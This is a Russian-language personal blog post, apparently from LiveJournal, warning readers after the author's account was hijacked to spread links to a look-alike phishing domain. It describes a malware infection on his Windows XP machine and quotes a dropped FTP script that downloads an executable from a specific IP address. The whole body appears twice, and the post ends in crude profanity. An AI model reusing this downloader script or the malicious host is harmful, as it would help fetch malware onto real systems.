Сцуко! Какие-то уебаны ЛОМАНУЛИ мой аккаунт в ЖЖ! :(((
ПРОЧТИТЕ, ЭТО ВАЖНО! С вами может произойти что-то подобное, так что лучше быть предупреждённым заранее!
Не думал, что я такой уж "популярный"... ;)
Раньше-то я предполагал, что ломают акки только известных личностей, а мой журнал вряд ли кому-то подойдёт. Но вот теперь, видимо, пришёл и мой черёд...
Давненько не заходил в ЖЖ - времени не было, а вот вчера зашёл и увидел тонны сообщений, написанных якобы от моего имени с информацией о сайте одноклассники. Причём все ссылки ведут не на официальный сайт odnoklassniki.ru, а на поддельный, название которого отличается на одну букву - odnoklgssniki.ru
Не ведитесь на эту удочку - это мошенники!!!
Интересно, как они подобрали мой пароль? Учитывая, что он был из 10 символов (буквы в разном регистре, цифры), брут-форс невозможен - триллионы и триллионы комбинаций, которые невозможно было проверить в обозримое время. Скорее всего, пароль был просто украден из кэша вирусной программой. Как это могло произойти, спросите вы? А вот как (предполагаемый вариант развития событий).
Незадолго до этих событий, а именно 6 декабря, я решил обновить версию антивирусной программы Avira (с 2012 на 2013). Но так как автоматом она обновляться не захотела, то мне пришлось удалить старую версию. Но при установке новой версии возникли конфликты, из-за которых легко установить её не удалось - пришлось полдня провозиться с чисткой реестра и т.п. Но даже после этого программа не заработала, и мне пришлось несколько раз её удалять и переустанавливать. Так что практически весь день мой компьютер оставался незащищённым. В конце концов, Avira всё-таки встала на место.
Уже поздно вечером, незадолго до того, как я собрался выключить свой компьютер, произошло странное событие: неожиданно появилось сообщение об аварийном завершении процесса server.exe (это внутренний компонент Windows), чего раньше никогда не происходило. Я как-то не придал этому особого значения, доделал свои дела, и выключил комп.
Каково же было моё удивление, когда на следующий день, включив свой компьютер, я обнаружил, что не могу зайти в Windows XP! Обычно я заходил под аккаунтом админа без пароля, а в этот раз мне предлагалось войти в учётную запись некоего пользователя linwen$. Эта учётная запись была защищена паролем, который я, конечно же, не знал. Впрочем, эту проблему удалось обойти, загрузив Windows в безопасном режиме (без поддержки сети). Там я уже без труда вошёл под учётной записью админа, после чего открыл "Управление компьютером"-"Локальные пользователи и группы" и удалил всякое упоминание о linwen$ из соответствующих папок. После чего снова перезагрузил Windows уже в обычном режиме и вошёл в систему, как администратор (автоматически). В нормальном режиме работы загрузилась Avira и с радостью сообщила мне о том, что в системе было обнаружено несколько вирусных файлов: sserver.exe, stserver.exe, bootserver.exe и hexserver.exe Эти файлы находились в корне C:\ (туда, видимо, они были загружены из Интернета) в папке C:\RECYCLER (для последующего восстановления) и в C:\Windows\system32 (основная системная папка - ну разумеется! :))) ). Также в C:\ и указанных папках я нашёл ещё один файл, который не обнаружил антивирус, но который имел непосредственное отношение к сабжу - xpserver.exe, который не был на самом деле программой (поэтому Avira его и не обнаружила), а текстовым скриптом следующего содержания:
open 114.112.63.227
123
123
get server.exe c:\bootserver.exe
bye
114.112.63.227 - это, скорее всего, IP-адрес, с которого вирус и попал на мой компьютер.
В результате все вирусные файлы были удалены (но я сохранил их копии "на память" в специальном запароленном архиве), и система вернулась в работоспособное состояние. Но что этот вирус мог натворить на моём компьютере? Вроде бы никаких серьёзных изменений я не обнаружил - всё осталось на своих местах. Во вкладке "Описание" вирусных файлов было указано название "World browser", т.е. буквально, "просмотровщик мира", так что, вероятно, эта программа являлась шпионской, и действительно могла передавать какие-то данные на сервер злоумышленников.
Но "не пужайтесь, граждане"! (с) Я изменил свой пароль ЖЖ и уже принимаю меры по очистке своего журнала от мусора и в самом ближайшем времени здесь появятся все ранее запланированные мной статьи! До самых скорых встреч!!! ;))
P.S.
Блядь, эти пидерасы ещё и кучу говнометок понаделывали! Это просто полный пиздец! :(((
Не думал, что я такой уж "популярный"... ;)
Раньше-то я предполагал, что ломают акки только известных личностей, а мой журнал вряд ли кому-то подойдёт. Но вот теперь, видимо, пришёл и мой черёд...
Давненько не заходил в ЖЖ - времени не было, а вот вчера зашёл и увидел тонны сообщений, написанных якобы от моего имени с информацией о сайте одноклассники. Причём все ссылки ведут не на официальный сайт odnoklassniki.ru, а на поддельный, название которого отличается на одну букву - odnoklgssniki.ru
Не ведитесь на эту удочку - это мошенники!!!
Интересно, как они подобрали мой пароль? Учитывая, что он был из 10 символов (буквы в разном регистре, цифры), брут-форс невозможен - триллионы и триллионы комбинаций, которые невозможно было проверить в обозримое время. Скорее всего, пароль был просто украден из кэша вирусной программой. Как это могло произойти, спросите вы? А вот как (предполагаемый вариант развития событий).
Незадолго до этих событий, а именно 6 декабря, я решил обновить версию антивирусной программы Avira (с 2012 на 2013). Но так как автоматом она обновляться не захотела, то мне пришлось удалить старую версию. Но при установке новой версии возникли конфликты, из-за которых легко установить её не удалось - пришлось полдня провозиться с чисткой реестра и т.п. Но даже после этого программа не заработала, и мне пришлось несколько раз её удалять и переустанавливать. Так что практически весь день мой компьютер оставался незащищённым. В конце концов, Avira всё-таки встала на место.
Уже поздно вечером, незадолго до того, как я собрался выключить свой компьютер, произошло странное событие: неожиданно появилось сообщение об аварийном завершении процесса server.exe (это внутренний компонент Windows), чего раньше никогда не происходило. Я как-то не придал этому особого значения, доделал свои дела, и выключил комп.
Каково же было моё удивление, когда на следующий день, включив свой компьютер, я обнаружил, что не могу зайти в Windows XP! Обычно я заходил под аккаунтом админа без пароля, а в этот раз мне предлагалось войти в учётную запись некоего пользователя linwen$. Эта учётная запись была защищена паролем, который я, конечно же, не знал. Впрочем, эту проблему удалось обойти, загрузив Windows в безопасном режиме (без поддержки сети). Там я уже без труда вошёл под учётной записью админа, после чего открыл "Управление компьютером"-"Локальные пользователи и группы" и удалил всякое упоминание о linwen$ из соответствующих папок. После чего снова перезагрузил Windows уже в обычном режиме и вошёл в систему, как администратор (автоматически). В нормальном режиме работы загрузилась Avira и с радостью сообщила мне о том, что в системе было обнаружено несколько вирусных файлов: sserver.exe, stserver.exe, bootserver.exe и hexserver.exe Эти файлы находились в корне C:\ (туда, видимо, они были загружены из Интернета) в папке C:\RECYCLER (для последующего восстановления) и в C:\Windows\system32 (основная системная папка - ну разумеется! :))) ). Также в C:\ и указанных папках я нашёл ещё один файл, который не обнаружил антивирус, но который имел непосредственное отношение к сабжу - xpserver.exe, который не был на самом деле программой (поэтому Avira его и не обнаружила), а текстовым скриптом следующего содержания:
open 114.112.63.227
123
123
get server.exe c:\bootserver.exe
bye
114.112.63.227 - это, скорее всего, IP-адрес, с которого вирус и попал на мой компьютер.
В результате все вирусные файлы были удалены (но я сохранил их копии "на память" в специальном запароленном архиве), и система вернулась в работоспособное состояние. Но что этот вирус мог натворить на моём компьютере? Вроде бы никаких серьёзных изменений я не обнаружил - всё осталось на своих местах. Во вкладке "Описание" вирусных файлов было указано название "World browser", т.е. буквально, "просмотровщик мира", так что, вероятно, эта программа являлась шпионской, и действительно могла передавать какие-то данные на сервер злоумышленников.
Но "не пужайтесь, граждане"! (с) Я изменил свой пароль ЖЖ и уже принимаю меры по очистке своего журнала от мусора и в самом ближайшем времени здесь появятся все ранее запланированные мной статьи! До самых скорых встреч!!! ;))
P.S.
Блядь, эти пидерасы ещё и кучу говнометок понаделывали! Это просто полный пиздец! :(((